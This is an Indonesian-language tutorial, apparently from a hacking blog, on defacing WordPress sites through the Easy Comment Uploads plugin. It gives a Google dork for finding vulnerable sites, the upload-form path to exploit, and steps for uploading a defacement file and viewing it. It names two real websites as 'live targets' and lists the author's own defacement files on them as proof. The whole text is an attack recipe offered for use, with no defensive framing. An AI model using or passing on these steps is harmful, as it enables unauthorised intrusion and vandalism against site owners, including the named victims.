Deface Exploit Wp Easy Comment Upload Plugin + Live Target

halo whats up exploiter, kali ini saya akan share tutorial deface metode wp easy comment upload plugin, metode ini sangat mudah, ok langsung aja.

#Google dork :

- inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php

#Exploit :

- /wp-content/plugins/easy-comment-uploads/upload-form.php

#Live Target :

- http://www.blog.escasto.ipn.mx/

- https://www.fairyhouses.com/

1. Dorking menggunakan dork diatas atau gunakan live target diatas.

2. kalau sudah masukkan exploit di akhir domain. contoh : target.com/wp-content/plugins/easy-comment-uploads/upload-form.php

3. jika vuln maka tampilannya sperti gambar di bawah ini

4. upload script deface berformat .txt

5. jika sudah langsung akses saja, dengan cara 

target.com/wp-content/uploads/tahun/bulan/scriptkalian.txt

contoh : target.com/wp-content/uploads/2020/03/lix.txt

6. dan taraa berhasil

Hasil Saya :

- https://www.fairyhouses.com/wp-content/uploads/2020/03/lix.txt

- http://www.blog.escasto.ipn.mx/wp-content/uploads/2020/03/lix.txt

Ok sekian dari saya, terimakasih

#No_IDentiTy ~ LinuXploit